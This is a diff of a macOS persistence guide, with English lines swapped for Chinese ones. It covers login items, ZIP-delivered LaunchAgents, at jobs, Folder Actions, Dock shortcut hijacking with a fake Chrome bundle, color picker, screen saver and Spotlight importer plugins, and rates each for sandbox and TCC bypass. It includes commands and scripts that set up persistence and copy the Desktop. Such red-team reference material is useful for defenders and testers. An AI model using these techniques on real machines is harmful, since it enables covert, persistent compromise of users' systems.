[🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但需要使用参数执行 `osascript` +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Locations +#### 位置 - **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** - - **Trigger:** Login - - Exploit payload stored calling **`osascript`** +- **触发器:** 登录 +- 利用有效载荷存储调用 **`osascript`** - **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** - - **Trigger:** Login - - Root required +- **触发器:** 登录 +- 需要 root 权限 -#### Description - -In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\ -It it's possible to list them, add and remove from the command line: +#### 描述 +在系统偏好设置 -> 用户与群组 -> **登录项** 中,您可以找到 **用户登录时要执行的项目**。\ +可以通过命令行列出、添加和删除它们: ```bash #List all items: osascript -e 'tell application "System Events" to get the name of every login item' @@ -669,57 +626,49 @@ osascript -e 'tell application "System Events" to make login item at end with pr #Remove an item: osascript -e 'tell application "System Events" to delete login item "itemname"' ``` +这些项目存储在文件 **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** -These items are stored in the file **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** +**登录项** 也可以通过 API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) 指示,该配置将存储在 **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** -**Login items** can **also** be indicated in using the API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) which will store the configuration in **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** +### ZIP 作为登录项 -### ZIP as Login Item +(查看关于登录项的前一部分,这是一个扩展) -(Check previous section about Login Items, this is an extension) +如果将 **ZIP** 文件存储为 **登录项**,则 **`Archive Utility`** 将打开它,如果该 zip 例如存储在 **`~/Library`** 中并包含文件夹 **`LaunchAgents/file.plist`** 及后门,则该文件夹将被创建(默认情况下并不存在),plist 将被添加,因此下次用户再次登录时,**plist 中指示的后门将被执行**。 -If you store a **ZIP** file as a **Login Item** the **`Archive Utility`** will open it and if the zip was for example stored in **`~/Library`** and contained the Folder **`LaunchAgents/file.plist`** with a backdoor, that folder will be created (it isn't by default) and the plist will be added so the next time the user logs in again, the **backdoor indicated in the plist will be executed**. - -Another options would be to create the files **`.bash_profile`** and **`.zshenv`** inside the user HOME so if the folder LaunchAgents already exist this technique would still work. +另一个选项是在用户 HOME 中创建文件 **`.bash_profile`** 和 **`.zshenv**,这样如果文件夹 LaunchAgents 已经存在,这种技术仍然有效。 ### At -Writeup: [https://theevilbit.github.io/beyond/beyond_0014/](https://theevilbit.github.io/beyond/beyond_0014/) +写作: [https://theevilbit.github.io/beyond/beyond_0014/](https://theevilbit.github.io/beyond/beyond_0014/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But you need to **execute** **`at`** and it must be **enabled** -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但你需要 **执行** **`at`** 并且它必须是 **启用的** +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 -- Need to **execute** **`at`** and it must be **enabled** +- 需要 **执行** **`at`** 并且它必须是 **启用的** -#### **Description** +#### **描述** -`at` tasks are designed for **scheduling one-time tasks** to be executed at certain times. Unlike cron jobs, `at` tasks are automatically removed post-execution. It's crucial to note that these tasks are persistent across system reboots, marking them as potential security concerns under certain conditions. - -By **default** they are **disabled** but the **root** user can **enable** **them** with: +`at` 任务旨在 **调度一次性任务** 在特定时间执行。与 cron 作业不同,`at` 任务在执行后会自动删除。需要注意的是,这些任务在系统重启后是持久的,在某些条件下将其标记为潜在的安全隐患。 +默认情况下,它们是 **禁用的**,但 **root** 用户可以通过以下方式 **启用** **它们**: ```bash sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist ``` - -This will create a file in 1 hour: - +这将在1小时内创建一个文件: ```bash echo "echo 11 > /tmp/at.txt" | at now+1 ``` - -Check the job queue using `atq:` - +使用 `atq` 检查作业队列: ```shell-session sh-3.2# atq 26 Tue Apr 27 00:46:00 2021 22 Wed Apr 28 00:29:00 2021 ``` - -Above we can see two jobs scheduled. We can print the details of the job using `at -c JOBNUMBER` - +上面我们可以看到两个已调度的作业。我们可以使用 `at -c JOBNUMBER` 打印作业的详细信息。 ```shell-session sh-3.2# at -c 26 #!/bin/sh @@ -744,18 +693,16 @@ LC_CTYPE=UTF-8; export LC_CTYPE SUDO_GID=20; export SUDO_GID _=/usr/bin/at; export _ cd /Users/csaby || { - echo 'Execution directory inaccessible' >&2 - exit 1 +echo 'Execution directory inaccessible' >&2 +exit 1 } unset OLDPWD echo 11 > /tmp/at.txt ``` - > [!WARNING] -> If AT tasks aren't enabled the created tasks won't be executed. - -The **job files** can be found at `/private/var/at/jobs/` +> 如果 AT 任务未启用,则创建的任务将不会被执行。 +**作业文件**可以在 `/private/var/at/jobs/` 找到。 ``` sh-3.2# ls -l /private/var/at/jobs/ total 32 @@ -764,46 +711,44 @@ total 32 -r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2 -rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2 ``` +文件名包含队列、作业编号和计划运行的时间。例如,我们来看一下 `a0001a019bdcd2`。 -The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at `a0001a019bdcd2`. +- `a` - 这是队列 +- `0001a` - 十六进制的作业编号,`0x1a = 26` +- `019bdcd2` - 十六进制的时间。它表示自纪元以来经过的分钟数。`0x019bdcd2` 在十进制中是 `26991826`。如果我们将其乘以 60,我们得到 `1619509560`,即 `GMT: 2021. April 27., Tuesday 7:46:00`。 -- `a` - this is the queue -- `0001a` - job number in hex, `0x1a = 26` -- `019bdcd2` - time in hex. It represents the minutes passed since epoch. `0x019bdcd2` is `26991826` in decimal. If we multiply it by 60 we get `1619509560`, which is `GMT: 2021. April 27., Tuesday 7:46:00`. +如果我们打印作业文件,我们会发现它包含了我们使用 `at -c` 获得的相同信息。 -If we print the job file, we find that it contains the same information we got using `at -c`. +### 文件夹操作 -### Folder Actions +写作: [https://theevilbit.github.io/beyond/beyond_0024/](https://theevilbit.github.io/beyond/beyond_0024/)\ +写作: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d) -Writeup: [https://theevilbit.github.io/beyond/beyond_0024/](https://theevilbit.github.io/beyond/beyond_0024/)\ -Writeup: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d) +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但你需要能够调用 `osascript` 并带有参数以联系 **`System Events`** 来配置文件夹操作 +- TCC 绕过: [🟠](https://emojipedia.org/large-orange-circle) +- 它具有一些基本的 TCC 权限,如桌面、文档和下载 -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But you need to be able to call `osascript` with arguments to contact **`System Events`** to be able to configure Folder Actions -- TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - - It has some basic TCC permissions like Desktop, Documents and Downloads - -#### Location +#### 位置 - **`/Library/Scripts/Folder Action Scripts`** - - Root required - - **Trigger**: Access to the specified folder +- 需要 root 权限 +- **触发**: 访问指定文件夹 - **`~/Library/Scripts/Folder Action Scripts`** - - **Trigger**: Access to the specified folder +- **触发**: 访问指定文件夹 -#### Description & Exploitation +#### 描述与利用 -Folder Actions are scripts automatically triggered by changes in a folder such as adding, removing items, or other actions like opening or resizing the folder window. These actions can be utilized for various tasks, and can be triggered in different ways like using the Finder UI or terminal commands. +文件夹操作是由文件夹中的变化自动触发的脚本,例如添加、删除项目或其他操作,如打开或调整文件夹窗口的大小。这些操作可以用于各种任务,并可以通过不同的方式触发,例如使用 Finder 界面或终端命令。 -To set up Folder Actions, you have options like: +要设置文件夹操作,你可以选择: -1. Crafting a Folder Action workflow with [Automator](https://support.apple.com/guide/automator/welcome/mac) and installing it as a service. -2. Attaching a script manually via the Folder Actions Setup in the context menu of a folder. -3. Utilizing OSAScript to send Apple Event messages to the `System Events.app` for programmatically setting up a Folder Action. - - This method is particularly useful for embedding the action into the system, offering a level of persistence. - -The following script is an example of what can be executed by a Folder Action: +1. 使用 [Automator](https://support.apple.com/guide/automator/welcome/mac) 创建文件夹操作工作流并将其安装为服务。 +2. 通过文件夹的上下文菜单中的文件夹操作设置手动附加脚本。 +3. 利用 OSAScript 向 `System Events.app` 发送 Apple Event 消息,以编程方式设置文件夹操作。 +- 这种方法特别适合将操作嵌入系统,提供一定程度的持久性。 +以下脚本是文件夹操作可以执行的示例: ```applescript // source.js var app = Application.currentApplication(); @@ -813,15 +758,11 @@ app.doShellScript("touch ~/Desktop/folderaction.txt"); app.doShellScript("mkdir /tmp/asd123"); app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` - -To make the above script usable by Folder Actions, compile it using: - +要使上述脚本可通过文件夹操作使用,请使用以下命令编译它: ```bash osacompile -l JavaScript -o folder.scpt source.js ``` - -After the script is compiled, set up Folder Actions by executing the script below. This script will enable Folder Actions globally and specifically attach the previously compiled script to the Desktop folder. - +在脚本编译后,通过执行以下脚本来设置文件夹操作。此脚本将全局启用文件夹操作,并将之前编译的脚本特定地附加到桌面文件夹。 ```javascript // Enabling and attaching Folder Action var se = Application("System Events") @@ -831,17 +772,13 @@ var fa = se.FolderAction({ name: "Desktop", path: "/Users/username/Desktop" }) se.folderActions.push(fa) fa.scripts.push(myScript) ``` - -Run the setup script with: - +运行设置脚本: ```bash osascript -l JavaScript /Users/username/attach.scpt ``` +- 这是通过 GUI 实现此持久性的方式: -- This is the way yo implement this persistence via GUI: - -This is the script that will be executed: - +这是将要执行的脚本: ```applescript:source.js var app = Application.currentApplication(); app.includeStandardAdditions = true; @@ -850,59 +787,53 @@ app.doShellScript("touch ~/Desktop/folderaction.txt"); app.doShellScript("mkdir /tmp/asd123"); app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` - -Compile it with: `osacompile -l JavaScript -o folder.scpt source.js` - -Move it to: - +将其移动到: ```bash mkdir -p "$HOME/Library/Scripts/Folder Action Scripts" mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts" ``` - -Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp): +然后,打开 `Folder Actions Setup` 应用,选择您想要监视的 **文件夹**,并在您的情况下选择 **`folder.scpt`**(在我的情况下我称其为 output2.scp):
-Now, if you open that folder with **Finder**, your script will be executed. +现在,如果您使用 **Finder** 打开该文件夹,您的脚本将被执行。 -This configuration was stored in the **plist** located in **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** in base64 format. +此配置存储在 **plist** 中,位于 **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** 的 base64 格式。 -Now, lets try to prepare this persistence without GUI access: +现在,让我们尝试在没有 GUI 访问的情况下准备这个持久性: -1. **Copy `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** to `/tmp` to backup it: - - `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp` -2. **Remove** the Folder Actions you just set: +1. **复制 `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** 到 `/tmp` 进行备份: +- `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp` +2. **移除** 您刚设置的文件夹操作:
-Now that we have an empty environment +现在我们有了一个空环境 -3. Copy the backup file: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/` -4. Open the Folder Actions Setup.app to consume this config: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"` +3. 复制备份文件:`cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/` +4. 打开 Folder Actions Setup.app 以使用此配置:`open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"` > [!CAUTION] -> And this didn't work for me, but those are the instructions from the writeup:( +> 这对我没有用,但这些是写作中的说明:( -### Dock shortcuts +### Dock 快捷方式 -Writeup: [https://theevilbit.github.io/beyond/beyond_0027/](https://theevilbit.github.io/beyond/beyond_0027/) +写作: [https://theevilbit.github.io/beyond/beyond_0027/](https://theevilbit.github.io/beyond/beyond_0027/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But you need to have installed a malicious application inside the system -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但您需要在系统中安装恶意应用程序 +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - `~/Library/Preferences/com.apple.dock.plist` - - **Trigger**: When the user clicks on the app inside the dock +- **触发**:当用户点击 Dock 中的应用程序时 -#### Description & Exploitation +#### 描述与利用 -All the applications that appear in the Dock are specified inside the plist: **`~/Library/Preferences/com.apple.dock.plist`** - -It's possible to **add an application** just with: +所有出现在 Dock 中的应用程序都在 plist 中指定: **`~/Library/Preferences/com.apple.dock.plist`** +只需通过以下方式即可 **添加应用程序**: ```bash # Add /System/Applications/Books.app defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/System/Applications/Books.app_CFURLStringType0' @@ -910,9 +841,7 @@ defaults write com.apple.dock persistent-apps -array-add 'tile-data /tmp/Google\ Chrome.app/Contents/Info.plist "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> - CFBundleExecutable - Google Chrome - CFBundleIdentifier - com.google.Chrome - CFBundleName - Google Chrome - CFBundleVersion - 1.0 - CFBundleShortVersionString - 1.0 - CFBundleInfoDictionaryVersion - 6.0 - CFBundlePackageType - APPL - CFBundleIconFile - app +CFBundleExecutable +Google Chrome +CFBundleIdentifier +com.google.Chrome +CFBundleName +Google Chrome +CFBundleVersion +1.0 +CFBundleShortVersionString +1.0 +CFBundleInfoDictionaryVersion +6.0 +CFBundlePackageType +APPL +CFBundleIconFile +app EOF @@ -965,92 +894,86 @@ cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chr defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0' killall Dock ``` - -### Color Pickers +### 颜色选择器 Writeup: [https://theevilbit.github.io/beyond/beyond_0017](https://theevilbit.github.io/beyond/beyond_0017/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - A very specific action needs to happen - - You will end in another sandbox -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [🟠](https://emojipedia.org/large-orange-circle) +- 需要发生一个非常特定的动作 +- 你将进入另一个沙盒 +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - `/Library/ColorPickers` - - Root required - - Trigger: Use the color picker +- 需要 root 权限 +- 触发: 使用颜色选择器 - `~/Library/ColorPickers` - - Trigger: Use the color picker +- 触发: 使用颜色选择器 -#### Description & Exploit +#### 描述与利用 -**Compile a color picker** bundle with your code (you could use [**this one for example**](https://github.com/viktorstrate/color-picker-plus)) and add a constructor (like in the [Screen Saver section](macos-auto-start-locations.md#screen-saver)) and copy the bundle to `~/Library/ColorPickers`. +**编译一个颜色选择器** 包含你的代码(你可以使用 [**这个例子**](https://github.com/viktorstrate/color-picker-plus))并添加一个构造函数(如在 [屏幕保护程序部分](macos-auto-start-locations.md#screen-saver) 中)并将包复制到 `~/Library/ColorPickers`。 -Then, when the color picker is triggered your should should be aswell. - -Note that the binary loading your library has a **very restrictive sandbox**: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64` +然后,当颜色选择器被触发时,你的代码也应该被触发。 +请注意,加载你的库的二进制文件有一个 **非常严格的沙盒**: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64` ```bash [Key] com.apple.security.temporary-exception.sbpl - [Value] - [Array] - [String] (deny file-write* (home-subpath "/Library/Colors")) - [String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers")) - [String] (allow file-read* (extension "com.apple.app-sandbox.read")) +[Value] +[Array] +[String] (deny file-write* (home-subpath "/Library/Colors")) +[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers")) +[String] (allow file-read* (extension "com.apple.app-sandbox.read")) ``` +### Finder Sync 插件 -### Finder Sync Plugins +**写作**: [https://theevilbit.github.io/beyond/beyond_0026/](https://theevilbit.github.io/beyond/beyond_0026/)\ +**写作**: [https://objective-see.org/blog/blog_0x11.html](https://objective-see.org/blog/blog_0x11.html) -**Writeup**: [https://theevilbit.github.io/beyond/beyond_0026/](https://theevilbit.github.io/beyond/beyond_0026/)\ -**Writeup**: [https://objective-see.org/blog/blog_0x11.html](https://objective-see.org/blog/blog_0x11.html) +- 有助于绕过沙盒: **不,因为你需要执行自己的应用程序** +- TCC 绕过: ??? -- Useful to bypass sandbox: **No, because you need to execute your own app** -- TCC bypass: ??? +#### 位置 -#### Location +- 一个特定的应用程序 -- A specific app +#### 描述与利用 -#### Description & Exploit - -An application example with a Finder Sync Extension [**can be found here**](https://github.com/D00MFist/InSync). - -Applications can have `Finder Sync Extensions`. This extension will go inside an application that will be executed. Moreover, for the extension to be able to execute its code it **must be signed** with some valid Apple developer certificate, it must be **sandboxed** (although relaxed exceptions could be added) and it must be registered with something like: +一个带有 Finder Sync 扩展的应用程序示例 [**可以在这里找到**](https://github.com/D00MFist/InSync)。 +应用程序可以拥有 `Finder Sync Extensions`。这个扩展将嵌入到将要执行的应用程序中。此外,为了使扩展能够执行其代码,它 **必须被签名**,并且必须拥有有效的 Apple 开发者证书,它必须是 **沙盒化的**(尽管可以添加放宽的例外),并且必须注册为类似于: ```bash pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex pluginkit -e use -i com.example.InSync.InSync ``` - -### Screen Saver +### 屏幕保护程序 Writeup: [https://theevilbit.github.io/beyond/beyond_0016/](https://theevilbit.github.io/beyond/beyond_0016/)\ Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you will end in a common application sandbox -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙箱: [🟠](https://emojipedia.org/large-orange-circle) +- 但你将进入一个常见的应用程序沙箱 +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - `/System/Library/Screen Savers` - - Root required - - **Trigger**: Select the screen saver +- 需要 root 权限 +- **触发**: 选择屏幕保护程序 - `/Library/Screen Savers` - - Root required - - **Trigger**: Select the screen saver +- 需要 root 权限 +- **触发**: 选择屏幕保护程序 - `~/Library/Screen Savers` - - **Trigger**: Select the screen saver +- **触发**: 选择屏幕保护程序
-#### Description & Exploit +#### 描述与利用 -Create a new project in Xcode and select the template to generate a new **Screen Saver**. Then, are your code to it, for example the following code to generate logs. - -**Build** it, and copy the `.saver` bundle to **`~/Library/Screen Savers`**. Then, open the Screen Saver GUI and it you just click on it, it should generate a lot of logs: +在 Xcode 中创建一个新项目,并选择模板以生成新的 **屏幕保护程序**。然后,将你的代码添加到其中,例如以下代码以生成日志。 +**构建**它,并将 `.saver` 包复制到 **`~/Library/Screen Savers`**。然后,打开屏幕保护程序 GUI,点击它,它应该会生成大量日志: ```bash sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"' @@ -1059,12 +982,10 @@ Timestamp (process)[PID] 2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:] 2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet] ``` - > [!CAUTION] -> Note that because inside the entitlements of the binary that loads this code (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) you can find **`com.apple.security.app-sandbox`** you will be **inside the common application sandbox**. +> 请注意,因为在加载此代码的二进制文件的权限中(`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`),您可以找到 **`com.apple.security.app-sandbox`**,您将处于 **常见应用程序沙箱** 内。 Saver code: - ```objectivec // // ScreenSaverExampleView.m @@ -1079,196 +1000,190 @@ Saver code: - (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - self = [super initWithFrame:frame isPreview:isPreview]; - if (self) { - [self setAnimationTimeInterval:1/30.0]; - } - return self; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +self = [super initWithFrame:frame isPreview:isPreview]; +if (self) { +[self setAnimationTimeInterval:1/30.0]; +} +return self; } - (void)startAnimation { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super startAnimation]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super startAnimation]; } - (void)stopAnimation { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super stopAnimation]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super stopAnimation]; } - (void)drawRect:(NSRect)rect { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super drawRect:rect]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super drawRect:rect]; } - (void)animateOneFrame { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return; } - (BOOL)hasConfigureSheet { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return NO; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return NO; } - (NSWindow*)configureSheet { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return nil; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return nil; } __attribute__((constructor)) void custom(int argc, const char **argv) { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); } @end ``` - -### Spotlight Plugins +### Spotlight 插件 writeup: [https://theevilbit.github.io/beyond/beyond_0011/](https://theevilbit.github.io/beyond/beyond_0011/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you will end in an application sandbox -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) - - The sandbox looks very limited +- 有助于绕过沙盒: [🟠](https://emojipedia.org/large-orange-circle) +- 但你将进入一个应用程序沙盒 +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) +- 沙盒看起来非常有限 -#### Location +#### 位置 - `~/Library/Spotlight/` - - **Trigger**: A new file with a extension managed by the spotlight plugin is created. +- **触发**: 创建一个由 Spotlight 插件管理的扩展名的新文件。 - `/Library/Spotlight/` - - **Trigger**: A new file with a extension managed by the spotlight plugin is created. - - Root required +- **触发**: 创建一个由 Spotlight 插件管理的扩展名的新文件。 +- 需要 root 权限 - `/System/Library/Spotlight/` - - **Trigger**: A new file with a extension managed by the spotlight plugin is created. - - Root required +- **触发**: 创建一个由 Spotlight 插件管理的扩展名的新文件。 +- 需要 root 权限 - `Some.app/Contents/Library/Spotlight/` - - **Trigger**: A new file with a extension managed by the spotlight plugin is created. - - New app required +- **触发**: 创建一个由 Spotlight 插件管理的扩展名的新文件。 +- 需要新应用 -#### Description & Exploitation +#### 描述与利用 -Spotlight is macOS's built-in search feature, designed to provide users with **quick and comprehensive access to data on their computers**.\ -To facilitate this rapid search capability, Spotlight maintains a **proprietary database** and creates an index by **parsing most files**, enabling swift searches through both file names and their content. +Spotlight 是 macOS 内置的搜索功能,旨在为用户提供 **快速而全面的数据访问**。\ +为了促进这种快速搜索能力,Spotlight 维护一个 **专有数据库**,并通过 **解析大多数文件** 创建索引,从而能够快速搜索文件名及其内容。 -The underlying mechanism of Spotlight involves a central process named 'mds', which stands for **'metadata server'.** This process orchestrates the entire Spotlight service. Complementing this, there are multiple 'mdworker' daemons that perform a variety of maintenance tasks, such as indexing different file types (`ps -ef | grep mdworker`). These tasks are made possible through Spotlight importer plugins, or **".mdimporter bundles**", which enable Spotlight to understand and index content across a diverse range of file formats. +Spotlight 的基本机制涉及一个名为 'mds' 的中央进程,代表 **'metadata server'**。该进程协调整个 Spotlight 服务。与此相辅相成的是多个 'mdworker' 守护进程,它们执行各种维护任务,例如索引不同类型的文件 (`ps -ef | grep mdworker`)。这些任务通过 Spotlight 导入插件或 **".mdimporter bundles"** 实现,使 Spotlight 能够理解和索引各种文件格式的内容。 -The plugins or **`.mdimporter`** bundles are located in the places mentioned previously and if a new bundle appear it's loaded within monute (no need to restart any service). These bundles need to indicate which **file type and extensions they can manage**, this way, Spotlight will use them when a new file with the indicated extension is created. - -It's possible to **find all the `mdimporters`** loaded running: +插件或 **`.mdimporter`** 包位于前面提到的位置,如果出现新的包,它会在一分钟内加载(无需重启任何服务)。这些包需要指明它们可以管理的 **文件类型和扩展名**,这样,当创建具有指定扩展名的新文件时,Spotlight 将使用它们。 +可以通过运行 **find all the `mdimporters`** 来找到所有加载的内容: ```bash mdimport -L Paths: id(501) ( - "/System/Library/Spotlight/iWork.mdimporter", - "/System/Library/Spotlight/iPhoto.mdimporter", - "/System/Library/Spotlight/PDF.mdimporter", - [...] +"/System/Library/Spotlight/iWork.mdimporter", +"/System/Library/Spotlight/iPhoto.mdimporter", +"/System/Library/Spotlight/PDF.mdimporter", +[...] ``` - -And for example **/Library/Spotlight/iBooksAuthor.mdimporter** is used to parse these type of files (extensions `.iba` and `.book` among others): - +例如 **/Library/Spotlight/iBooksAuthor.mdimporter** 用于解析这些类型的文件(扩展名 `.iba` 和 `.book` 等): ```json plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist [...] "CFBundleDocumentTypes" => [ - 0 => { - "CFBundleTypeName" => "iBooks Author Book" - "CFBundleTypeRole" => "MDImporter" - "LSItemContentTypes" => [ - 0 => "com.apple.ibooksauthor.book" - 1 => "com.apple.ibooksauthor.pkgbook" - 2 => "com.apple.ibooksauthor.template" - 3 => "com.apple.ibooksauthor.pkgtemplate" - ] - "LSTypeIsPackage" => 0 - } - ] +0 => { +"CFBundleTypeName" => "iBooks Author Book" +"CFBundleTypeRole" => "MDImporter" +"LSItemContentTypes" => [ +0 => "com.apple.ibooksauthor.book" +1 => "com.apple.ibooksauthor.pkgbook" +2 => "com.apple.ibooksauthor.template" +3 => "com.apple.ibooksauthor.pkgtemplate" +] +"LSTypeIsPackage" => 0 +} +] [...] - => { - "UTTypeConformsTo" => [ - 0 => "public.data" - 1 => "public.composite-content" - ] - "UTTypeDescription" => "iBooks Author Book" - "UTTypeIdentifier" => "com.apple.ibooksauthor.book" - "UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor" - "UTTypeTagSpecification" => { - "public.filename-extension" => [ - 0 => "iba" - 1 => "book" - ] - } - } +=> { +"UTTypeConformsTo" => [ +0 => "public.data" +1 => "public.composite-content" +] +"UTTypeDescription" => "iBooks Author Book" +"UTTypeIdentifier" => "com.apple.ibooksauthor.book" +"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor" +"UTTypeTagSpecification" => { +"public.filename-extension" => [ +0 => "iba" +1 => "book" +] +} +} [...] ``` - > [!CAUTION] -> If you check the Plist of other `mdimporter` you might not find the entry **`UTTypeConformsTo`**. Thats because that is a built-in _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform_Type_Identifier)) and it doesn't need to specify extensions. +> 如果你检查其他 `mdimporter` 的 Plist,你可能找不到条目 **`UTTypeConformsTo`**。这是因为它是内置的 _统一类型标识符_ ([UTI](https://en.wikipedia.org/wiki/Uniform_Type_Identifier)),不需要指定扩展名。 > -> Moreover, System default plugins always take precedence, so an attacker can only access files that are not otherwise indexed by Apple's own `mdimporters`. +> 此外,系统默认插件总是优先,因此攻击者只能访问未被苹果自己的 `mdimporters` 索引的文件。 -To create your own importer you could start with this project: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) and then change the name, the **`CFBundleDocumentTypes`** and add **`UTImportedTypeDeclarations`** so it supports the extension you would like to support and refelc them in **`schema.xml`**.\ -Then **change** the code of the function **`GetMetadataForFile`** to execute your payload when a file with the processed extension is created. +要创建你自己的导入器,你可以从这个项目开始:[https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer),然后更改名称、**`CFBundleDocumentTypes`** 并添加 **`UTImportedTypeDeclarations`**,以便支持你想要支持的扩展,并在 **`schema.xml`** 中反映它们。\ +然后 **更改** 函数 **`GetMetadataForFile`** 的代码,以便在创建具有处理扩展名的文件时执行你的有效载荷。 -Finally **build and copy your new `.mdimporter`** to one of thre previous locations and you can chech whenever it's loaded **monitoring the logs** or checking **`mdimport -L.`** +最后 **构建并复制你的新 `.mdimporter`** 到之前的某个位置,你可以通过 **监控日志** 或检查 **`mdimport -L.`** 来查看它是否被加载。 -### ~~Preference Pane~~ +### ~~偏好面板~~ > [!CAUTION] -> It doesn't look like this is working anymore. +> 这似乎不再有效。 -Writeup: 